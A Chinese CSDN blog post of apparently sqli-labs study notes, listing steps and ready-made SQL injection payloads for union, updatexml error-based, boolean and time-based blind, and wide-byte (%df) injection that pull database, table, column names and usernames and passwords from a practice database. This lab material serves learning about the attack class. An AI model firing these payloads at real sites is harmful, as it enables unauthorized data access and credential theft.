1.19 SQL注入

最新推荐文章于 2024-07-07 13:00:43 发布
最新推荐文章于 2024-07-07 13:00:43 发布
阅读量2.1k 收藏
点赞数
文章标签: 数据库 安全 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52471916/article/details/122848343
版权

联合查询>>

1.判断网站是否存在注入漏洞

2.判断网站的闭合字符(and条件判断或者页面报错信息或者能不能执行某个函数)

3.判断列数 order by

4.判断显示位 (有哪些位置的内容可以被显示在前端页面上)

5.查询网站数据库的版本

6.查询当前网站数据库名字  database()

7.查询当前网站数据库下的所有表 information_schema

8.查询当前网站数据库指定表里面的所有列

9.查询当前网站数据库下的指定表内指定列的字段内容

求库名

?id=1’and updatexml(1,concat(0x23,database()),1) -- +

求表名

?id=1’ and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=’security’)),3) -- +

求列名

?id=1’ and

updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’)),3) -- +

求字段内容

?id=1’ and

updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),3)

?id=-1 union select 1,(select group_concat(id,0x23,username,0x23,password) from users),3 --+


盲注一般步骤>>

1.求闭合字符

2.求出当前数据库名的长度

3.求出当前数据库名对应的ascii值

4.求表的数量

5.求表名的长度

6.求表名对应的ascii值

7.求列的数量

8.求列名的长度

9.列名对应的ascii值

10.求字段的数量

11.求字段内容的长度

12.求字段内容对应的ascii值

布尔型盲注>>

特点:页面存在异常,但是既没有回显也没有报错信息

利用:只能通过正确与错误两种状态来判断payload是否正确

利用判断语句来证明推测是否正确,正确时,页面正常显示;错误时,页面异常

求数据库长度

?id=1’ and length(database())=8 %23

求数据库的ascii码值

?id=1’ and ascii(substr(database(),1,1))=115 %23

求数据库下表的数量

id=1’ and (select count(table_name)from information_schema.tables where table_schema=’security’)=4%23

求表名的ascii码值

?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101%23

求列的数量

id=1’ and (select count(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’)=3%23

求列名的ascii码值

id=1’ and ascii(substr((select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’limit 0,1),1,1))=105%23

求字段的数量

id=1’ and (select count(username) from security.users)=13%23

求字段内容

id=1’ and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68%23

时间型盲注

求数据库库名长度

id=1’and if(length(database())=8,sleep(3),1) -- +

求数据库库名对应的ascii值

id=1’ and if(ascii(substr((select database()),1,1))=115,sleep(3),1) -- +

求表的数量

id=1’and if((select count(*)from information_schema.tables where table_schema=’security’)=4,sleep(3),1) -- +

求表名的长度

id=1’ and if((select length(table_name)from information_schema.tables where table_schema=’security’limit 0,1)=6,sleep(3),1) -- +

求表名对应的ascii码

id=1’ and if(ascii(substr((select (table_name)from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101,sleep(3),1) -- +

求列的数量

id=1’ and if((select count(column_name)from information_schema.columns where table_schema=’security’ and table_name=’users’)=3,sleep(3),1) -- +

求列名的ascii码

id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105,sleep(3),1) -- +

求字段数量

id=1' and if((select count(username)from security.users)=13,sleep(3),1) -- +

求字段内容

id=1’ and if(ascii(substr((select concat(username,0x23,password)from security.users limit 0,1),1,1))=68,sleep(3),1) -- +

2.Less-32宽字节注入练习,操作步骤配截图。并且描述下宽字节注入的条件和原理。

宽字节注入:

利用编码转换,将服务器端强制添加的本来用于转义的\符号吃掉,从而能使攻击者输入的引号起到闭合作用,以至于可以进行SQL注入。

?id=-1%df union select 1,2,database()--+

?id=-1%df union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

?id=-1%df' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)--+

?id=-1%df' union select 1,2,(select group_concat(username,password) from security.users)--+

Sy嗣音
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅谈SQL注入攻击与防御(适用于小白观看)
weixin_48477703的博客
06-12 1645
首先你要明白什么是SQL注入攻击 SQL注入式攻击技术,一般针对基于Web平台的应用程序.造成SQL注入攻击漏洞的原因,是由于程序员在编写Web程序时,没有对浏览器端提交的参数进行严格的过滤和判断。用户可以修改构造参数,提交SQL查询语句,并传递至服务器端,从而获取想要的敏感信息,甚至执行危险的代码或系统命令。 SQL注入的原理 SQL注入攻击原理:程序命令和用户数据(即用户输入)之...
vscode1.19
01-27
vscode1.19.3,vscode1.19.3,vscode1.19.3,vscode1.19.3,vscode1.19.3,vscode1.19.3,vscode1.19.3,vscode1.19.3,
SQL注入----报错注入简介(updatexml)
一只web狗
06-21 3373
报错注入(updatexml)常用语句
网络安全基础知识
luqi5的博客
01-22 282
一、NAT是什么? 怎样隐藏内部ip? 重装系统的方法: 制作U盘启动 *rufus 驱动 备份资料 软件 查询一下biosU盘启动 装win10 全盘安装 efi+gpt win7 需要安装驱动 二、网络基础 缺省子网掩码=默认网关 子网划分步骤: [外链图片转存中…(img-8HYRQGs4-1597051237541)] cmd 命令 设置登录时间 net user name /times: 列出所有连接 netstat -ano 显示
sql注入学习(3)第5和6关报错注入,
qfslyy的博客
12-26 478
今天exp注入时发现数据库版本不对,老版本phpstudy不能换数据库版本,于是换了小皮,但是怎么都连不上数据库,最后发现时php版本忘换了,gan。 先了解一下别的注入: exp和updatexml exp: and exp(~(select xfrom(select x from x.x))x)) 第一关举例: 使用这种方式获得数据库名。欧克了 报错注入: updatexml(要操作的文件名,(构造一个xpath语法),新值) updatexml(1,(concat(0x23,(database())
sql注入学习笔记:
m0_52341820的博客
04-14 352
一、Mysql基础知识 1、注释 单行注释 # 多行注释 /* */ 单行注释 --空格 一般用-- + 内联注释 /*!5001*/ 注释掉的内容只有高版本的mysql才会执行 2、语句 语句/函数 解释/功能 示例 union 用来拼接两个select语句,每个查询必须拥有相同列数,结果等于等一个select语句中的列名,默认选取不同值,允许重复值用union all ...
MySQL数据库笔记1
jia1083661的博客
11-21 234
查看服务器中的所有数据库 show databases; 选择某一个数据库操作 在这里插入代码片
OpenResty预防SQL注入
IPDs的博客
08-07 294
OpenResty 预防 SQL注入
CTFHub SQl注入 时间盲注(sqlmap)
赤城封雪的博客
08-07 4949
CTFHub SQl注入 时间盲注(sqlmap) 0x00 简单介绍 这篇文章主要通过 CTFHub 时间盲注案例简单记录一下 sqlmap 的使用流程。 参考:sqlmap用户手册 | WooYun知识库 (xmd5.com) sqlmap 的功能: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 (具体过程可见文章末尾案例) sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2
jacob-1.19
11-17
在本文中,我们将深入探讨Jacob-1.19的关键特性、工作原理以及如何在实际项目中应用。 1. Jacob-1.19简介: Jacob-1.19是一个开源的Java库,它通过JNI(Java Native Interface)实现了Java和COM接口的通信。这意味...
tslib1.19 资源下载
12-21
tslib is a cross-platform library that provides access to touchscreen devices and the ability to apply filters to their input events.
jacob最新1.19版-免费下载
12-03
这个最新的1.19版本提供了解决Java应用程序与Windows应用程序之间通信的有效途径,特别适用于需要在Java环境中使用ActiveX控件或访问Office自动化功能的场景。 **主要组件** 1. **jacob.jar**:这是Jacob的核心库...
com.jacob:1.19.rar 下载
09-23
<version>1.19 <scope>system ${project.basedir}/lib/jacob.jar ``` 请确保`systemPath`指向的是实际的Jacob jar文件位置。同时,因为Jacob需要访问动态链接库(DLL),所以还需要在运行时将DLL文件加入到...
流式数据库 RisingWave「Demo」:直播指标实时分析
https://risingwave.com/
07-04 802
直播是目前最为流行的娱乐形式之一,本教程将分享如何使用开源流式数据库 RisingWave 监控直播指标。我们为本教程设置了一个演示集群,以便大家可以轻松尝试。
QT学习积累——方法参数加const和不加const的区别
Arya的博客,专注后端领域
07-03 1056
QT学习积累——方法参数加const和不加const的区别
JDBC (基础)
最新发布
weixin_51644244的博客
07-07 331
思考: java和sql是两种不同的编程语言。翻译程序---每个数据库厂商都提高了翻译软件-- -打包jar。---我们的java代码引入jar就可完成与数据库的沟通。Java :OOP 面向对象的编程对象。SQL: 结构化查询语言。
电子科大数据库第四章:数据库设计与实现
m0_73672331的博客
07-04 1011
一种面向用户的系统数据模型,用来描述现实世界的系统概念化数据结构。
数据库原理之并发控制的基本概念
m0_75262255的博客
07-06 1098
并发控制的简单介绍。
安装numpy1.19
09-10
3. 输入以下命令安装Numpy 1.19:`pip install numpy==1.19`。这将使用pip包管理器下载并安装指定版本的Numpy。 4. 等待安装过程完成。安装过程可能需要一段时间,取决于您的网络连接和计算机性能。 5. 安装完成后,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值